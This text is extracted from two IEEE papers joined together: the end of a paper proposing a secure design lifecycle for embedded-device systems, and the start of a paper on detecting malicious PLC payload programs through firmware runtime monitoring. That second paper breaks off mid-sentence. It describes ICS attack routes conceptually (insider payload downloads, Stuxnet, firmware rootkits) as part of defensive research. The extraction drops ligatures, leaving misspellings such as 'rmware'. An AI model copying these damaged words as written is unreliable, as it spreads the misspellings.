at iden tifying possible threats from third party software, as well as to ensure registration and timely updates of this software. To develop complex enterpri se-level software systems the frameworks of appropriate level are usually used. One of such frameworks was the Zachman Framework [6]. In this framework, two classical approaches fo r the solution of analytical problems were used. The first approach is based on answering six key questions: what, how, when, who, where and why. It is important to note that basing on the answers to these questions one can form a holistic description of rather complex processes. The second approach consists of six consecutive development phases, namely identification, definition, representation, specification, configuration and instantiation. So the Zachman Framework has 6x6 matrix format in which columns correspond to question words, and rows are the phases of development. Each cell in the resulting table represents the corresponding simple model. The application of the Zachman Framework to design secure systems based on embedded devices allows to organize business logic of the system that provides the ability to form corresponding security requirements. One possible approach for designing secure embedded devices is presented in papers [7, 8]. The essence of the technique proposed in these papers is to identify and account the list of possible harmful effects, to which the embedded device may be subj ect in accordance with the selected model of the intruder, and also by used hardware and software components, already in the design phase. In this approach, the protection tools are direct part of the embedded device, ensuring its security. Let us consider the main phases of the specified technique in more detail: (1) definition of functional requirements for the embedded device; (2) definition of non-functional requirements to the embedded device; (3) identifying the set of alternatives of component composition of the embedded device in accordance with the functional requirements; (4) choice of the optimal component composition of the embedded device from the point of view of non-functional requirements; (5) identification of the list of possible harmful impacts on the embedded device based on the static testing. Thus, if the security level of an embedded device is sufficient, one can proceed to the stage of direct development. Otherwise, one should return to the first step and review the functional requirements. Unfortunately, a system based on the interaction of embedded devices, each of which is designe d in accordance with the methodology for designing secure embedded devices, cannot be considered secure due to unique emergent properties occurring during operation of the system. In order to develop a system of secure communications between embedded devices a variety of techniques are also used. One example of such techniques was presented within the framework of the European research project SecFutur [9], devoted to the development of systems with embedded devices. In this project it was 278 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:12 UTC from IEEE Xplore. Restrictions apply. proposed the use the topological approaches for building secure channels for data transmission between embedded devices. To solve this problem the calculation of the security of the path between two points in a network graph was performed basing on some numeric values of security assigned to the nodes. After it this characteristic served as the basis for changes of requirements on embedded devices. However, this approach does not take into account the interaction of systems of embedded devices with external systems (or takes into account the interaction only from embedded devices), which may cause problems at integrated protection of the network containing embedded devices. III. G ENERAL APPROACH The developed approach combines solutions for developing secure software w ith models and techniques of designing secure embedded devices in a single integrated technique for designing secure systems based on embedded devices, taking into account the emergent properties of the protected system. The first step of the proposed technique for designing secure systems based on embedded devices is the definition of functional and non-functional requirements for the developed system based on embedded devices. The functional requirements may be divided into requirements for embedded devices of the system, the requirements for the software of the system, and requirements for interfaces and data transfer protocols, on the basis of which the further cooperation of embedded devices and software in the framework of the designed system is performed. To limit the dimension of the final selection of possible alternatives of embedded de vices and software of the system the non-functional requirements are formulated. Typically, valid non-functional requirements specify the range of cost, power consumption and dimensions of the embedded devices, and valid ra nge of value and resource consumption of the software. Fu rther, the requirements for embedded devices are taken into account in the implementation of the design technique for secure embedded devices (step 2), software requirements are used at implementing the de sign technique for secure embedded software (step 3), and the requirements for interfaces and data transfer protocols are used at implementation of the design technique for the secure embedded device system (step 4) as well as design technique for secure embedded devices (step 2), and the design technique for secure software (step 3). The second step of the proposed technique is to apply the technique of designing secure embedded devices . In this step the functional requirements provided in the first step are analyzed to identify possible alternatives of component composition of em bedded devices. In addition, the check of the correspondence of the obtained alternatives to the non-functional requirements, identified in the first step, is performed. It is important to note that according to the results of th e analysis of functional and non-functional requirements, it may be concluded that the correspondence of some functional requirements may be done only partially or it may be totally impossible because of too strong restrictions of non-functional requirements. To resolve this situation, the proposed technique provides production of relevant notification about necessity for making changes in the functional and/or non-functional requirements for the system based on embedded devices, as well as the recommendation for the refusal from some of them. The list of possible alternatives of component composition of embedded devices directly depends on the quality of the knowledge base, which is used by the technique for design of secure embedded devices. However, as soon as the list of possible alternatives of component composition of embedded devices for the designed system is formed, among them the optimal one from the point of view of non-functional requirements will be selected. Further, in accordance with the technique for designing secure embedded devices, basing on static testing the list of possible harmful impacts on the model of the embedded device is analyzed, and the model is adjusted. Thus, at the completion of the second step of the proposed technique there will be generated the secure embedded device model, information about which will be transferred to the secure design technique for embedded system devices (step 4). On the third step of the proposed technique the analysis of security and privacy requirements and the design requirements to the software of the system based on embedded devices is performed. Further, on the basis of the security and privacy risk assessments and threat model static testing process is performed. As in the previous step, while performing a technique of designing secure software there may be done a conclusion that the satisfaction of individual fu nctional or non-functional requirements is partially possible or impossible at all. Usually this is due to the lack of computing performance used by embedded devices or with application of not cross-platform solutions. In such a situation, you will also receive a notification of the n eed for partial changes in the functional and/or non-functi onal requirements, and about refusal from some of them. Thus, at the completion of the third step of the proposed technique there will be comp iled secure software model, information about which will be transferred to the design technique for secure embedded devices system (step 4). The fourth step of the proposed technique is the use of design technique for secure embedded device system . The essence of this technique is the formation of an embedded devices system model based on the requirements to the interfaces and data transfer protocols, as well as on the formed in the previous steps secure embedded device model (step 2) and secure software model (step 3). When performing this technique, initially a list of possible alternatives of models of systems, based on embedded devices that meet functional requirements, is formed. 279 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:12 UTC from IEEE Xplore. Restrictions apply. Then the conformity of the obtained alternatives to the restrictions imposed by non-functional requirements is checked, and among them the optimal one from the point of view of data requirements is selected. After it, basing on the static testing, the list of possible harmful impacts on the embedded device system model is analyzed, and the model is adjusted. Thus, at the completion of the fourth step of the propos ed technique, the secure embedded device system model is generated, information about which will be transferred to the final stage of the implementation of secure system based on embedded device (step 7). The fifth step of the proposed technique is an embedded device manufacturing process . In this step, basing on information about the secure embedded device model (step 2) and secure embedded devices system model (step 4), the real devices are produced. Their security is determined by application of the corresponding technique. After it secure embedded devices are transferred to the final stage of the implementation of secure system based on embedded devices (step 7). The sixth step of the proposed technique represents the implementation and verification phases of secure software. In this step, basing on information about the secure software model (step 3) and the secure embedded devices system model (step 4), the software is developed. The protection of the software is determined by the application of the corresponding technique. After it the secure software is transferre d to the final stage of the implementation of the secure system based on embedded devices (step 7). The seventh (final) step of the proposed technique is the implementation of the s ecure system based on embedded devices. At this step the system is realized by locating the used embedded devices, laying of communication lines between them and their setup. In addition, the software and related protection mechanisms are installed and configured. The result of this step is the ready-to-use secure system based on embedded devices. The security of the system is determined by a set of techniques: the design technique for secure embedded devices at the level of embedded device model; design technique for secure software at the level of the software model; design technique for secure embedded devices on the level of embedded devices system model, as well as Software SDL at the software development phase. The combination of these techniques and instruments represents the lifecycle of de velopment of secure systems based on embedded devices or Design Lifecycle of Secure Embedded Devices System (DLSEDS), shown in Figure 1. Figure 1. Design Lifecycle of Secure Embedded Devices System 280 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:12 UTC from IEEE Xplore. Restrictions apply. IV. APPLICATION OF THE APPROACH The architecture of the in tegrated cyber-physical security system [10], designed with the use of DLSEDS, is shown in Figure 2. The integrated cyber-physical security system consists of four main modules: hardware interfaces (module 1), software inte rfaces (module 2), hubs (module 3), integrated cyber security system server (module 4). Let is consider each module more in detail. Module 1. Hardware Interfaces. These modules can be implemented as microcontrollers, that aimed to collect information from external sour ces and convert the external format of events to the internal format. The resulting stream of events goes to hub. To enhance to security of the proposed system the hardware interfaces use the encryption algorithms for protecting the channel between hub and them. Also they perform the mutual authentication procedure to protect the system against fake modules. Module 2. Software Interfaces. These interfaces are used to collect data from computers and other cyber physical security systems by special drivers. Module 3. Hubs. These modules can be implemented as high-performance microcont rollers. The aim of these modules is to collect data from software and hardware interfaces and to perform the data normalization and pre- processing; after that the data are stored and presented to the user by the web-interface (if the controlled system is small) or forwarded to the se rver of the integrated cyber- physical security system (if the controlled system is large). Module 4. The server of the integrated cyber-physical security system. This module can be implemented as the computer (the required performance of which depends on the size of the controlled system). This module includes several components, namely: collection component (it receives data from the hubs) , database component (it stores collected and processed data), data processing module (it correlates entry logs from the database to automatic detection of incide nts, attack scenarios and anomalous activity) and visualization component (it shows the results to the operator and helps him to make decisions). The results of the work of the processing component also can be sent to the external systems (e.g., security information and event management systems) to provide the high level representation of the detected incidents, attack scenarios and anomalous activity. Figure 2. Integrated cyber-physical security syst em as the application of the DLSEDS One of the important tasks for applications of DLSEDS for designing secure systems based on embedded devices is the formation of a secure environment of data transmission from detectors, alarms, sensors, readers and other external electronic components connected to embedded devices. However, the interaction of embedded devices with the specified data sources, as a rule, depends on the interface, supported by the given data source, and data transmission protocol, and thus it is not possible to affect the security of this cooperation within the framework of DLSEDS. Alongside the area of DLSEDS may be divided into the area of design technique for secure systems based on embedded devices, the area of secure software development lifecycle and area of design technique for secure embedded devices. Thus, in the process of applying the design technique for secure systems based on embedded devices, it was decided to expand the functionality of the I2C protocol by mechanisms of the mutual authentication of embedded devices and encryption of transmitted data. According to the results of the performed expert assessment, it was confirmed that the use of the developed approach allows to enhance the security of the developing system. Additionally, experts noted that DLSEDS allows to reduce the time spent on the development of secure 281 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:12 UTC from IEEE Xplore. Restrictions apply. systems based on embedded devices by automation of alternatives generation, taking into account the possible conflicts between the system elements and embedded devices. V. DISCUSSION DLSEDS allows developers to design complex secure systems based on embedded devices without involvement of experts in the domain of embedded devices security. This assumes that the embedded devices of the system are also protected, and their composition is rational or optimal from the point of view of the requirements. Unfortunately, the list of possible alternatives of component composition of embedded devices, as well as information on supported interfaces and data transfer protocols depend on the quality of the knowledge base, which is used by the technique of designing secure embedded devices, as well as the technique of designing secure systems based on them. This means that the quality of the solution, provided by DLSEDS, directly depends on the completeness and relevance of the used knowledge base, and therefore DLSEDS still is not a full replacement for expert opinions. An expert in the field of security systems based on embedded devices, having knowledge about the specific solutions and existing best practice, as a rule, chooses the component composition of embedded devices, as well as interfaces and data transfer pr otocols for their interaction with each other and the server software on a qualitatively higher level. On the other hand, DLSEDS may be useful to the expert as a tool to automate some routine tasks, as well as a source of solutions that differ from his (her) subjective preferences. VI. C ONCLUSION In this paper we analyzed existing approaches to the development of secure software, as well as the techniques of designing secure embedded devices for their applicability for solving the problem of designing secure systems based on embedded devices. As the result of the performed analysis, the aut hors came to the conclusion about necessity to develop the own technique for the design of secure systems based on embedded devices, because none of the analyzed approaches or their combination allowed to solve the problem in full. As a result the Design Lifecycle of Secure Embedded Devices System (DLSEDS) approach was developed. This approach represents the comb ination of the approach to the development of secure software, the technique for design of secure embedded devices, and the developed technique for designing secure systems based on embedded devices. The last suggested technique acts as a link, formulating requirements both to the technique for designing secure embedded devices and to the approach for developing secure software and also provides security of data transmission channe ls between the protected embedded devices. The correctness of design life cycle for secure embedded devices systems was validated by its use in the development of the integrated cyber-physical security system. In further research on this topic it is planned to conduct additional experiments on the use of DLSEDS, to expand the existing knowledge base on component composition of embedded de vices, supported interfaces and data transfer protocols, and application of vulnerabilities database to improve the efficiency of the process of static testing. A CKNOWLEDGMENT This research is being supported by the grants of the RFBR (15-07-07451, 16-37-00338, 16-29-09482), partial support of budgetary subjects 0073-2015-0004 and 0073- 2015-0007, and Grant 074-U01. R EFERENCES [1] V. A. Desnitsky, D. S. Levshun, A. A. Chechulin and I. V. Kotenko, Design technique for secure embedded devices: application for creation of inte grated cyber-physical security system, Journal of Wireless Mobile Networks, Ubiquitous Computing, and Dependable Applications (JoWUA) , vol. 7, no. 2, pp. 60-80, 2016. [2] J. F. Ruiz, V. A. Desnitsky, R. Harjani, A. Manna, I. V. Kotenko and A. A. Chechulin, A methodology for the analysis and modeling of security threats and attacks for systems of embedded components, Proceeding of the 20th In ternational Euromicro Conference on Parallel, Distributed and Network-based Processing (PDP 2012) , Garching/Munich, February 2012, pp. 261-268. [3] F. Stefanni, A Design & Verification Methology for Networked Embedded Systems , Ph. D. Thesis, University of Verona, Department of Computer Science, Italy, April 7, 2011, 143 p. [4] M. Howard, S. Lipner, The Security Development Lifecycle. SDL: A Process for Developing Demonstrably More Secure Software , Microsoft Press, Redmond, Washington, 2006, 320 p. [5] Official Cisco Secure Development Lifecycle documentation. http://www.cisco.com/c/en/us/a bout/security-center/security- programs/secure-development-lif ecycle.html, last visited on 22.02.2017. [6] C. O Rourke, N. Fishman, W. Selkow, Enterprise Architecture using the Zachman Framework , Course Technology, 2003, 752 p. [7] V. A. Desnitsky, A. A. Chechulin, I. V. Kotenko, D. S. Levshun, M. V. Kolomeec, Application of a technique for secure embedded device design based on co mbining security components for creation of a perimeter protection system, in Proceedings of the 24th IEEE Euromicro International Conference on Parallel, Distributed, and Network-Based Processing (PDP 2016) , Heraklion, Greece, Febr uary 2016, pp. 609-616. [8] V. A. Desnitsky, I. V. Kotenko, A. A. Chechulin, Configuration- based approach to embedded device security, Lecture Notes in Computer Science, Springer-Ve rlag. The Sixth International Conference Mathematical Methods, Models and Architectures for Computer Networks Security (MMM-ACNS-2012) , St. Petersburg, Russia, October 17-19, 2012, pp. 270-285. [9] Official website of SecFutur pr oject. http://www.secfutur.eu/, last visited on 22.02.2017. [10] I. V. Kotenko, D. S. Levshun, A. A. Chechulin, Event correlation in the integrated cyber-phy sical security system, Proceedings of the 2016 XIX IEEE International Conference on Soft Computing and Measurements (SCM-2016) , St. Petersburg, Russia, May 2016, pp. 484-486. 282 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:12 UTC from IEEE Xplore. Restrictions apply.
Detecting_Payload_Attacks_on_Programmable_Logic_Controllers_PLCs.pdf
Programmable logic controllers (PLCs) play criti- cal roles in industrial control systems (ICS). Providing hardware peripherals and rmware support for control programs (i.e., a PLC s payload ) written in languages such as ladder logic, PLCs directly receive sensor readings and control ICS physical processes. An attacker with access to PLC development software (e.g., by compromising an engineering workstation) can modify the payload program and cause severe physical damages to the ICS. To protect critical ICS infrastructure, we propose to model runtime behaviors of legitimate PLC payload program and use runtime behavior monitoring in PLC rmware to detect payload attacks. By monitoring the I/O access patterns, network access patterns, as well as payload program timing characteristics, our proposed rmware-level detection mechanism can detect abnormal runtime behaviors of malicious PLC payload. Using our proof-of-concept implementation, we evaluate the memory and execution time overhead of implementing our proposed method and nd that it is feasible to incorporate our method into existing PLC rmware. In addition, our evaluation results show that a wide variety of payload attacks can be effectively detected by our proposed approach. The proposed rmware-level payload attack detection scheme complements existing bump- in-the-wire solutions (e.g., external temporal-logic-based model checkers) in that it can detect payload attacks that violate real- time requirements of ICS operations and does not require any additional apparatus. I. I NTRODUCTION In industrial control systems (ICS), programmable logic controllers (PLC) play a critical role in process automation. As cyber attacks targeting ICS increase in sophistication, eld devices, such as PLCs, are of particular concerns because they directly monitor and control physical processes. As shown in Figure 1, PLCs are typically deployed close to sensors and actuators, implementing local control actions (i.e., regulatory control). In addition of utilizing sensor data and controlling actuators locally, PLCs transmit real-time process data to operator workstations and execute their commands, facilitating the realization of supervisory control. Due to the unique and vital role of PLCs in critical ICS infrastructure [1], they are one of the major targets of cyber attacks. For example, the Stuxnet attack managed to silently sabotage centrifuges in a uranium-enrichment plant by reading and writing code blocks on PLCs from a compromised engineering workstation [2], [3]. By modifying a PLC s control program, severe damages (e.g., data loss, interruption of system operation, and destruction of ICS equipment) can be induced by attackers. In [4], it is shown that malicious code can easily be slipped into PLC control programs and evade the scrutiny of relay engineers from both academia and industry. Therefore, it is crucial Engineering Workstation Operator Workstation (HMI) Physical InfrastructureSensor Actuator Sensor Actuator Sensor Actuator Sensor ActuatorPLC Control NetworkCorporate Workplace Corporate NetworkFig. 1. Architecture of industrial control systems and the role of PLCs. to devise automated detection method against cyber attacks launched by modi ed PLC s control program. As PLCs are special-purpose computers interfacing with various sensors/actuators and providing rmware support to run control programs (also known as payload programs [5], [6]) that emulate the behaviors of an electric ladder dia- gram [7], [1], attacks on PLCs can be launched by modifying or overwriting the PLC payload program. Such attacks are known as PLC payload attacks. A PLC control program is typically written by a team of PLC engineers using the suite of programming languages speci ed in IEC 61131-3 [8]. Such a control program is regarded as the payload of a PLC s rmware, which controls access to hardware resources (e.g., inputs, outputs, and timers) and repeatedly loops through the payload instructions. An attacker with PLC access (e.g., by gaining control of an engineering workstation running PLC development and monitoring software) can download malicious payload and gain full control over its sensors and actuators. In the Stuxnet attack, a component of Stuxnet is capable of launching payload attacks on PLCs by rst infecting an engineering workstation and then downloading malicious code blocks [3]. Payload attacks can also be carried out by an insider (e.g., a disgruntled employee) with the help of tools such as SABOT [5], which generates malicious payload based on adversary-provided speci cations. Since legitimate payload relies on PLC programming instructions implemented by the rmware to carry out control and monitoring tasks, a malicious payload program can execute any combination of these instructions to sabotage the physical process. In this paper, we introduce runtime behavior monitoring into PLC rmware to detect payload attacks and protect ICS from severe physical damages. Based on control system spec- i cation provided by control system engineers, we establish runtime behavior pro le of normal/legitimate payload program in terms of I/O access patterns, network access patterns, as2018 IEEE Conference on Communications and Network Security (CNS) 978-1-5386-4586-4/18/$31.00 2018 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. well as payload program timing characteristics. When a newly updated payload program is downloaded into a PLC (either by an attacker or by a trusted control system engineer), its runtime behavior data is collected by the PLC rmware. When abnormal behaviors are observed by the rmware, execution of the payload program is terminated so that abnormal control signals will not be sent to actuators. The contributions of our work are as follows:  We introduce runtime behavior monitoring into PLC rmware to enable automated detection of PLC pay- load attacks. In contrast to existing detection methods based on linear temporal logic, our proposed approach can identify attacks that violate real-time requirements of an ICS and does not require the introduction of bump-in-the-wire apparatus between engineering workstation and PLCs.  We present a proof-of-concept implementation of the rmware-level payload attack detection scheme on ARMR CortexR -M4F microcontrollers. Our evalu- ation results show that the proposed approach can de- tect a wide variety of payload attacks revealed by prior research [4] and reported cyber-security incidents.  Furthermore, we evaluate the overhead of implement- ing the proposed detection method and nd that it is feasible to incorporate our scheme on microcontrollers used by existing PLCs to detect payload attacks. II. R ELATED WORK A. Programmable Logic Controller (PLC) and Payload Pro- gram Execution Model A programmable logic controller (PLC) is a special- purpose computer designed to replace relay panels and control a physical process [7]. Figure 2 presents the general hard- ware and software architecture of PLCs. There are several important characteristics that distinguish PLCs from personal computers [9]: PLCs are designed to operate in harsh industrial environments and are programmed in relay ladder logic or other PLC programming languages [8]. In addition, a PLC ex- ecutes a simple payload program in a sequential fashion. Once deployed in an ICS, a PLC continuously collects readings from sensors connected to its inputs, runs the PLC payload program, and generates outputs that control the physical process. As shown in Fig. 1, PLC control program can be developed on engineering workstations using programming software that supports ladder logic or other PLC programming languages and downloaded to target PLC for execution. Operator of an ICS may monitor and control the physical process via a human-machine interface (HMI), which communicates with PLCs to receive real-time process data and issue control commands. To control and monitor physical process, a PLC s rmware implements input and output image tables as well as a program scan cycle [7], [9]. A program scan cycle consists of input scan, program scan, output scan, and housekeeping phases, which are shown in Fig. 3. After system start-up, a PLC repeatedly walks through the four phases of the program scan cycle as follows: First, in the input scan phase, the PLC HardwareI/O Timer Counter CPU Memory CommunicationFirmware Input image table Output image table Driver libraryControl logicPLC payload/control programFig. 2. General PLC hardware and software architecture. PLC rmware samples the I/O pin values and writes them into the input image table. Then, in the program scan phase, instructions in the payload program are executed one by one using values stored in the input image table. Output values are generated during this phase and written into the output image table. Next, in the output scan phase, values in the output image table are transferred to the external output terminals, making control actions speci ed in the payload program take effect. Finally, in the housekeeping phase, internal checks on memory and system operation are performed. Additionally, communication requests originated from other hosts (e.g., the HMI) or generated by the payload program itself are also serviced before the next program scan cycle starts. B. PLC Ladder Logic Many widely-used PLC programming languages are stan- dardized in IEC 61131-3 [8] and ladder logic is the most commonly used one [9] since it is straightforward to control system engineers who prefer to de ne control actions in terms of relay contacts and coils. Instructions speci ed by ladder logic have their own symbolic representation. A PLC payload program written in ladder logic has one or more ladder- formatted schematic diagrams. Within each diagram, ladder logic instructions are organized into rungs. Each rung may contain multiple ladder logic instructions, which are evaluated from left to right. Instructions on the left of a rung test input conditions or outputs generated by other rungs, and instructions on the right generate rung outputs. Multiple input condition checks can be placed in tandem, and the input logic evaluates to true if and only if all input conditions are true. Parallel branches can be used on a rung to accommodate more than one input condition combinations. The rung logic is evaluated to true as long as one of the branches forms a true logic path. When multiple output branches are present on a rung, a true logic path controls multiple outputs. Fig. 4 shows a sample subroutine of a ladder logic program consisting of three rungs. The XIC instruction on the rst rung examines if an input is true. If so, the instruction evaluates to true. The OTE instruction energizes a speci ed output bit. Input condition of the rst rung rst checks if input bit I:0/4 or Program start-upInput scanProgram scan Output scanHouse- keeping Fig. 3. PLC payload program execution model.2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. I:0/4 I:0/3I:0/0 O:2/1O:2/2 Jump To SubroutineJSRXIC OTE SBR File Number U:7 ENDFig. 4. A sample ladder logic program with three rungs. I:0/3 is true and then checks if I:0/0 bit is true. The output of this rung controls both output bits, i.e., O:2/1 and O:2/2. The second rung s input condition is always true, so the subroutine in le U:7 is executed. Note that the subroutine is essentially another ladder logic diagram. When the subroutine returns, the second rung completes and the third rung is evaluated, which signals the end of the payload program. Note that hierarchical addressing is used in ladder logic program to specify the data type, slot number, and bit position of PLC data and peripherals [9]. For example, I:0/4 is the fth bit of binary input slot 0 (with the rst bit being I:0/0). For analog I/Os, the hierarchical address is slightly different. For example, O:2.0 is an analog output on the output module installed on slot 2, and the output value is written to the rst (zero-indexed) word of its allocated memory. Ladder logic provides a wide range of instructions for PLC engineers to specify control actions. Bit instructions examine status of individual input/internal bit or control a single output bit. Word instructions, such as mathematical operations, data transfer, and logical operations, operate on data words or registers. Program control instructions, such as subroutine invocation and return, control the execution ow of the payload program. For control program of large and complex ICS, subroutines are frequently used to better organize the instructions and enhancement maintainability. In addition, communication instructions allow a PLC to commu- nicate with other hosts via a particular ICS network protocol. From the perspective of PLC control program development, a malicious payload is essentially a combination of legitimate PLC programming instructions causing disastrous impacts on an ICS. In this paper, we focus on detecting payload attacks implemented via ladder logic, but the proposed techniques are applicable to attacks written in other languages [8] as well because different PLC programming languages can be used to implement the same control system speci cations [9]. C. Firmware vs. Payload Attacks As revealed by Fig. 2, both the PLC rmware and its payload program can become the target of cyber attacks. An attacker can reverse-engineer and modify the rmware on a PLC to launch rmware attacks. In this case, even though a legitimate payload program is downloaded to the PLC, its execution will still be monitored and/or intercepted by the modi ed rmware. In [10], a rootkit is developed on the CODESYS PLC runtime to intercept I/O operations of the payload program. When the payload wants to read or write a certain I/O pin, interrupt handler installed by the attacker is called rst, within which the attacker can recon gure the I/O pins or modify values to be read/written. In [6], a more advanced rootkit is developed for an Allen Bradley Compact- Logix PLC rmware. In addition to intercepting PLC inputsand outputs at the rmware, it incorporates physical-process awareness and always presents modi ed sensor measurements, hoaxing ICS operator in front of the HMI to think that the system runs normally. Firmware attacks typically requires detailed knowledge on target PLC s hardware components and reverse-engineering of its rmware because PLCs are closed-source embedded devices [11]. An attacker needs to install the rootkit on PLCs either via the built-in remote rmware update mechanism or by loading it via JTAG interface [6]. For rmware update process protected by cryptographic means (e.g., certi cate in the X.509 standard), it is hard to install a modi ed version of the rmware on the PLC. Alternatively, an attacker can load modi ed PLC rmware via JTAG interface. However, such an approach will require physical access to the PLC and possibly disassembling it. PLC payload attacks, on the other hand, are much easier to launch. An insider with proper privileges can easily down- load (e.g., a disgruntled control system engineer) a malicious payload program. As shown in Fig. 1, such an insider may download a malicious payload program via the engineering workstation to one or multiple PLCs. Integrity checks on PLC payload program cannot effectively prevent such attackers from downloading malicious payload because warnings on payload program changes can always be overridden once proper privileges are acquired (e.g., a password allowing engineers to repeatedly download revised payload program for development and debugging purposes). Alternatively, sophis- ticated cyber attacks, such as Stuxnet [2], [3], may include payload attack as a component to induce physical damages on ICS. Partial knowledge on the physical process can be suf cient to create a malicious payload using automated tools such as SABOT [5]. In [4], a small-scale challenge shows that malicious code snippets are likely to evade the scrutiny of code reviewers. Therefore, it is necessary to develop auto- mated payload attack detection mechanisms to protect physical infrastructure from PLC payload attacks. D. Payload Attack Detection As payload attacks can easily be launched by insiders or from compromised engineering workstations, several tech- niques that detect payload attacks have been proposed. In [12], a bump-in-the-wire device, called PLC guard, is introduced to intercept the communication between an engineering work- station and a PLC, allowing engineers to review the code and compare it against previous versions. Features of the PLC guard include various levels of graphical abstraction and summarization, which makes it easier to detect malicious code snippets. In [13], an external runtime monitoring device (e.g., a computer or an Arduino microcontroller board) sits alongside the PLC, monitors its runtime behaviors (e.g., inputs, outputs, timers, counters), and veri es them against ICS speci cations converted from a trusted version of the PLC payload program and written in interval temporal logic. It is shown that func- tional properties of payload program can be veri ed against ICS speci cations, but the types of payload attacks that can be detected by this approach remain to be explored. In [14], [15], a trusted safety veri er is introduced as a bump-in-the-wire device that automatically analyzes payload2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. program to be downloaded onto a PLC and veri es whether critical safety properties are met using linear temporal logic. However, linear temporal logic implicitly assumes that states of the systems are observed at the end of a set of time intervals. In the case of PLC payload program, snapshot of system states is taken at the end of each program scan cycle. As a result, real-time properties that does not span multiple program scan cycles cannot be checked by the trusted safety veri er. For example, a legitimate payload program is required to energize its output immediately when a certain input pin is energized. An attacker can inject malicious code and prolong the program scan cycle to cause real-time property violation while evading code analytics based on linear temporal logic. In [16], the timer on-delay (TON) ladder logic instruction is modeled using linear temporal logic. The TON instruction starts a timer when its input condition evaluates to true and energizes its output (i.e., the Done bit) when the timer reaches the preset value. It is shown in [16] that TON behavior can be approximated with the combination of liveness and fairness properties: Either TON instruction is not used or TON output bit will eventually be energized. However, linear temporal logic cannot verify whether the TON output bit is energized at the exact program scan cycle designated by control system engineers. Therefore, such an approximation does not capture critical real-time requirements of ICS. In this paper, we introduce runtime behavior modeling and monitoring of PLC payload in PLC rmware. Our proposed approach complements existing detection techniques and can detect violations of ICS real-time properties. In addition, our proposed approach does not require the introduction of any external apparatus that may introduce new vulnerabilities into ICS. E. Runtime Behavior Monitoring for Anomaly Detection The idea of detecting abnormal program behaviors by monitoring its execution at runtime has been applied to an rich array of computer systems. Runtime behavior monitoring techniques on operating systems such as Windows, Linux, and Android are reviewed in [17], [18]. However, these techniques cannot be directly applied to PLCs since PLCs are closed- source systems [11] running specialized rmware and payload programs. System calls utilized by existing techniques are not available in PLC systems. In [19], a runtime anomaly detector hardware design is proposed for embedded systems, which TABLE I. C ONTROL SYSTEM SPECIFICATIONS VS . LEGITIMATE PLC CONTROL LOGIC Control System Speci cation Legitimate Control System Logic Digital I/O pins, values & functionalityControl logic of binary inputs and outputs Analog I/O pins, value ranges, & functionalitySensor output and actuator input ranges, control logic of analog I/Os Legitimate sequences and timing relationships of I/O operationsControl logic of I/Os, possibly controlled by counters and timers Network data packet and timing relationshipsData from network for local control tasks or data required by remote hosts (e.g., HMI or other networked PLCs), and real-time requirements for these network events Network commands and timing relationshipsControl tasks mandated by operator workstation and their real-time requirementseliminates performance overheads incurred by software-based runtime monitoring methods. In [20], a timing-based PLC pro- gram anomaly detector is designed. An external data collector is deployed to collect program execution time measurements and detect unauthorized modi cations to the PLC system. In [21], runtime behaviors are monitored via dedicated hard- ware performance counters, which are not widely available in microcontrollers utilized by PLCs. To detect payload attacks in existing ICS, runtime behavior monitoring technique must utilize only the resources available on microcontrollers used in existing PLCs and does not require external apparatus (e.g., data collector proposed in [20]). III. S YSTEM OVERVIEW A. Adversary Model A malicious payload may be directly downloaded by an insider with PLC programming privilege. For instance, the insider can be a PLC programmer responsible for deploying tested PLC payload program. However, he/she downloads a different payload, which may be written anew or modi ed from the tested version. Since such an attacker has proper privilege to program PLCs, integrity checks on PLC payload program can be overridden and will not prevent malicious payload from being downloaded. For an external attacker, security aw of other ICS components may be exploited to gain access to an engineering workstation, which allows he/she to download malicious payload. For example, in the Stuxnet attack [2], many potential attack vectors, including the PLC programming environment, are exploited to eventually compromise a PLC-connected engineering workstation. We assume that the attacker is not capable of changing the PLC rmware, which requires either attacking the cryp- tographically protected rmware image or loading modi ed rmware directly via JTAG interface. Therefore, rmware- level detection mechanism proposed in this paper is not tampered by the attacker. The goal of a payload attack is not limited to blocking legitimate outputs, causing system inter- ruption, and destruction of system equipment. Sophisticated attacks such as the PLC blaster worm [22] which replicates itself to other PLCs can also be launched. However, such attacks download a payload program that are signi cantly different from the legitimate version in terms of program size and functionality, which can be identi ed by human operator monitoring the control system. In this paper, we consider stealthy payload attacks that are modi ed from legitimate payload programs. Such attacks preserve certain legitimate payload properties (e.g., always sending sensor readings re- quested by HMI) while carrying out malicious tasks. B. PLC Program Development Process and Control System Speci cations To develop PLC payload program for an ICS, the following process is typically adopted by PLC engineers: 1) Speci cation Formulation. Control tasks to be carried out by a PLC are identi ed and input/output signals required by these tasks are de ned. The logical sequence of operations for the PLC are speci ed,2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. e.g., in the form of sequence table, ow chart, or relay schematic [9]. 2) PLC Program Development. At this step, PLC pro- gram is developed based on the formulated speci - cations. Although an engineering team usually has its own set of guidelines and best practices on pro- gram organization and documentation, the generated PLC payload always aims to accurately implement the speci cations. At this stage, an attacker (e.g., a disgruntled control system engineer) may collect legitimate payload program and modify it to generate malicious payload. 3) Testing. Before deploying the PLC program, PLC engineers need to test the program via simulation or under some test environment. Safety properties (e.g., a circuit breaker must trip if a fault is detected) can be provided by system operators and/or iden- ti ed during speci cation formulation. In addition, different combinations of input values are fed to the PLC to ensure that correct responses are taken under different system operation scenarios. Although the test cases may not be exhaustive (e.g., it is hard to implement all test cases when analog inputs are used), important system properties, such as safety and real-time requirements, should always be validated. 4) Maintenance. After an initial version of the PLC control program is deployed, the ICS may go through hardware upgrades and design improvements. Ac- cordingly, the speci cations should be updated and the PLC program should be revised. After necessary testing, the new 